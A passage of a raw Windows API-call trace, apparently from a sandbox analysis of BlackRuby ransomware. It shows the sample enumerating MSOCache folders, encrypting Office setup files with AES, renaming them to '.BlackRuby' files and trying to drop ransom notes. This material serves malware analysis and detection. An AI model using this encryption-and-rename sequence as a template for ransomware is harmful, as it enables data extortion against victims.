lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0045.476] GetLastError () returned 0x5 [0045.476] SetErrorMode (uMode=0x1) returned 0x0 [0045.476] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.476] GetLastError () returned 0x0 [0045.476] GetFileType (hFile=0x184) returned 0x1 [0045.476] SetErrorMode (uMode=0x0) returned 0x1 [0045.476] GetFileType (hFile=0x184) returned 0x1 [0045.476] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0xc72 [0045.476] GetLastError () returned 0x0 [0045.480] ReadFile (in: hFile=0x184, lpBuffer=0x1b2c998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b2c998*, lpNumberOfBytesRead=0x18ed84*=0xc72, lpOverlapped=0x0) returned 1 [0045.487] GetLastError () returned 0x0 [0045.487] CloseHandle (hObject=0x184) returned 1 [0045.487] GetLastError () returned 0x0 [0045.487] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0045.487] GetLastError () returned 0x0 [0045.487] SetErrorMode (uMode=0x1) returned 0x0 [0045.487] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\outlookmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x365d56d0, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0xc72)) returned 1 [0045.487] GetLastError () returned 0x0 [0045.487] SetErrorMode (uMode=0x0) returned 0x1 [0045.487] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c680) returned 1 [0045.488] GetLastError () returned 0x0 [0045.519] CryptImportKey (in: hProv=0x37c680, pbData=0x1b889f8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360da0) returned 1 [0045.519] GetLastError () returned 0x0 [0045.519] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.519] GetLastError () returned 0x0 [0045.524] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.524] GetLastError () returned 0x0 [0045.524] CryptDuplicateKey (in: hKey=0x360da0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ce0) returned 1 [0045.524] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.524] GetLastError () returned 0x0 [0045.524] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x4, pbData=0x1bb5a44*=0x1, dwFlags=0x0) returned 1 [0045.524] GetLastError () returned 0x0 [0045.524] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x1, pbData=0x1bb5a10, dwFlags=0x0) returned 1 [0045.524] GetLastError () returned 0x0 [0045.525] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bb5a8c*, pdwDataLen=0x18ed74*=0xd70, dwBufLen=0xd70 | out: pbData=0x1bb5a8c*, pdwDataLen=0x18ed74*=0xd70) returned 1 [0045.525] GetLastError () returned 0x0 [0045.525] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bb7598*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1bb7598*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0045.525] GetLastError () returned 0x0 [0045.525] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bb75c8*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1bb75c8*, pdwDataLen=0x18ed94*=0x10) returned 1 [0045.525] GetLastError () returned 0x0 [0045.525] CryptDestroyKey (hKey=0x360da0) returned 1 [0045.525] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0045.525] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0045.525] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0045.525] GetLastError () returned 0x0 [0045.525] SetErrorMode (uMode=0x1) returned 0x0 [0045.525] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.526] GetLastError () returned 0xb7 [0045.526] GetFileType (hFile=0x184) returned 0x1 [0045.526] SetErrorMode (uMode=0x0) returned 0x1 [0045.526] GetFileType (hFile=0x184) returned 0x1 [0045.527] CloseHandle (hObject=0x184) returned 1 [0045.527] GetLastError () returned 0xb7 [0045.527] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0045.527] GetLastError () returned 0xb7 [0045.527] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Encrypted_EMOjJtcTtDJxwbg2N5bliySRIftnomeLs3FFGSPQYfYe8R.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Encrypted_EMOjJtcTtDJxwbg2N5bliySRIftnomeLs3FFGSPQYfYe8R.BlackRuby", lpFilePart=0x0) returned 0x81 [0045.527] GetLastError () returned 0xb7 [0045.527] SetErrorMode (uMode=0x1) returned 0x0 [0045.527] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\outlookmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x23577f00, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xd80)) returned 1 [0045.527] GetLastError () returned 0xb7 [0045.527] SetErrorMode (uMode=0x0) returned 0x1 [0045.528] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\outlookmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Encrypted_EMOjJtcTtDJxwbg2N5bliySRIftnomeLs3FFGSPQYfYe8R.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\encrypted_emojjtcttdjxwbg2n5bliysriftnomels3ffgspqyfye8r.blackruby")) returned 1 [0045.528] GetLastError () returned 0xb7 [0045.529] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.529] GetLastError () returned 0xb7 [0045.529] SetErrorMode (uMode=0x1) returned 0x0 [0045.529] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.529] GetLastError () returned 0x5 [0045.529] SetErrorMode (uMode=0x0) returned 0x1 [0045.530] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.530] GetLastError () returned 0x5 [0045.530] SetErrorMode (uMode=0x1) returned 0x0 [0045.530] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x1bd8380 | out: lpFileInformation=0x1bd8380*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x36e4fd60, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x106f)) returned 1 [0045.530] GetLastError () returned 0x5 [0045.530] SetErrorMode (uMode=0x0) returned 0x1 [0045.530] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.530] GetLastError () returned 0x5 [0045.530] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.530] GetLastError () returned 0x5 [0045.530] SetErrorMode (uMode=0x1) returned 0x0 [0045.530] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.530] GetLastError () returned 0x0 [0045.530] GetFileType (hFile=0x184) returned 0x1 [0045.530] SetErrorMode (uMode=0x0) returned 0x1 [0045.530] GetFileType (hFile=0x184) returned 0x1 [0045.530] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x106f [0045.531] GetLastError () returned 0x0 [0045.531] ReadFile (in: hFile=0x184, lpBuffer=0x1bda18c, nNumberOfBytesToRead=0x106f, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1bda18c*, lpNumberOfBytesRead=0x18ed84*=0x106f, lpOverlapped=0x0) returned 1 [0045.538] GetLastError () returned 0x0 [0045.539] CloseHandle (hObject=0x184) returned 1 [0045.539] GetLastError () returned 0x0 [0045.539] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.539] GetLastError () returned 0x0 [0045.539] SetErrorMode (uMode=0x1) returned 0x0 [0045.539] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x36e4fd60, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x106f)) returned 1 [0045.539] GetLastError () returned 0x0 [0045.539] SetErrorMode (uMode=0x0) returned 0x1 [0045.539] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c4e8) returned 1 [0045.539] GetLastError () returned 0x0 [0045.574] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c36644, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ca0) returned 1 [0045.574] GetLastError () returned 0x0 [0045.574] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.574] GetLastError () returned 0x0 [0045.579] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.579] GetLastError () returned 0x0 [0045.579] CryptDuplicateKey (in: hKey=0x360ca0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360a20) returned 1 [0045.579] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.579] GetLastError () returned 0x0 [0045.579] CryptSetKeyParam (hKey=0x360a20, dwParam=0x4, pbData=0x1c63690*=0x1, dwFlags=0x0) returned 1 [0045.579] GetLastError () returned 0x0 [0045.579] CryptSetKeyParam (hKey=0x360a20, dwParam=0x1, pbData=0x1c6365c, dwFlags=0x0) returned 1 [0045.579] GetLastError () returned 0x0 [0045.579] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c636d8*, pdwDataLen=0x18ed74*=0x1160, dwBufLen=0x1160 | out: pbData=0x1c636d8*, pdwDataLen=0x18ed74*=0x1160) returned 1 [0045.579] GetLastError () returned 0x0 [0045.579] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c659c4*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c659c4*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0045.579] GetLastError () returned 0x0 [0045.579] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c659f4*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c659f4*, pdwDataLen=0x18ed94*=0x10) returned 1 [0045.579] GetLastError () returned 0x0 [0045.579] CryptDestroyKey (hKey=0x360ca0) returned 1 [0045.579] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0045.579] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0045.579] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.579] GetLastError () returned 0x0 [0045.579] SetErrorMode (uMode=0x1) returned 0x0 [0045.579] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.580] GetLastError () returned 0xb7 [0045.580] GetFileType (hFile=0x184) returned 0x1 [0045.580] SetErrorMode (uMode=0x0) returned 0x1 [0045.580] GetFileType (hFile=0x184) returned 0x1 [0045.581] CloseHandle (hObject=0x184) returned 1 [0045.581] GetLastError () returned 0xb7 [0045.581] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.581] GetLastError () returned 0xb7 [0045.581] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Encrypted_QhdiUfj9ltiZC1P6pkc1vS7WByJvkfyHRgvbV6c.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Encrypted_QhdiUfj9ltiZC1P6pkc1vS7WByJvkfyHRgvbV6c.BlackRuby", lpFilePart=0x0) returned 0x7a [0045.581] GetLastError () returned 0xb7 [0045.581] SetErrorMode (uMode=0x1) returned 0x0 [0045.581] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x235ea320, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x1170)) returned 1 [0045.581] GetLastError () returned 0xb7 [0045.581] SetErrorMode (uMode=0x0) returned 0x1 [0045.581] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\Encrypted_QhdiUfj9ltiZC1P6pkc1vS7WByJvkfyHRgvbV6c.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\encrypted_qhdiufj9ltizc1p6pkc1vs7wbyjvkfyhrgvbv6c.blackruby")) returned 1 [0045.582] GetLastError () returned 0xb7 [0045.582] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.582] GetLastError () returned 0xb7 [0045.582] SetErrorMode (uMode=0x1) returned 0x0 [0045.582] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.582] GetLastError () returned 0x5 [0045.583] SetErrorMode (uMode=0x0) returned 0x1 [0045.583] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0045.583] GetLastError () returned 0x5 [0045.583] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.583] GetLastError () returned 0x5 [0045.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.583] GetLastError () returned 0x5 [0045.583] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0045.583] GetLastError () returned 0x5 [0045.583] SetErrorMode (uMode=0x1) returned 0x0 [0045.583] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ca0 [0045.583] GetLastError () returned 0x5 [0045.583] FindNextFileW (in: hFindFile=0x360ca0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.583] GetLastError () returned 0x5 [0045.583] FindNextFileW (in: hFindFile=0x360ca0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.583] GetLastError () returned 0x5 [0045.583] FindNextFileW (in: hFindFile=0x360ca0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.583] GetLastError () returned 0x5 [0045.583] FindNextFileW (in: hFindFile=0x360ca0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.583] GetLastError () returned 0x5 [0045.583] FindNextFileW (in: hFindFile=0x360ca0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.583] GetLastError () returned 0x5 [0045.583] FindNextFileW (in: hFindFile=0x360ca0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.583] GetLastError () returned 0x12 [0045.583] FindClose (in: hFindFile=0x360ca0 | out: hFindFile=0x360ca0) returned 1 [0045.584] SetErrorMode (uMode=0x0) returned 0x1 [0045.584] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0045.584] GetLastError () returned 0x12 [0045.584] SetErrorMode (uMode=0x1) returned 0x0 [0045.584] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ca0 [0045.584] GetLastError () returned 0x12 [0045.584] FindNextFileW (in: hFindFile=0x360ca0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.584] GetLastError () returned 0x12 [0045.584] FindNextFileW (in: hFindFile=0x360ca0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.584] GetLastError () returned 0x12 [0045.584] FindNextFileW (in: hFindFile=0x360ca0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.584] GetLastError () returned 0x12 [0045.584] FindNextFileW (in: hFindFile=0x360ca0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.584] GetLastError () returned 0x12 [0045.584] FindNextFileW (in: hFindFile=0x360ca0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.584] GetLastError () returned 0x12 [0045.584] FindNextFileW (in: hFindFile=0x360ca0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.584] GetLastError () returned 0x12 [0045.584] FindClose (in: hFindFile=0x360ca0 | out: hFindFile=0x360ca0) returned 1 [0045.584] SetErrorMode (uMode=0x0) returned 0x1 [0045.584] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.584] GetLastError () returned 0x12 [0045.584] SetErrorMode (uMode=0x1) returned 0x0 [0045.584] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x1c87ce4 | out: lpFileInformation=0x1c87ce4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3dff8840, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x978)) returned 1 [0045.585] GetLastError () returned 0x12 [0045.585] SetErrorMode (uMode=0x0) returned 0x1 [0045.585] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.585] GetLastError () returned 0x12 [0045.585] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.585] GetLastError () returned 0x12 [0045.585] SetErrorMode (uMode=0x1) returned 0x0 [0045.585] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 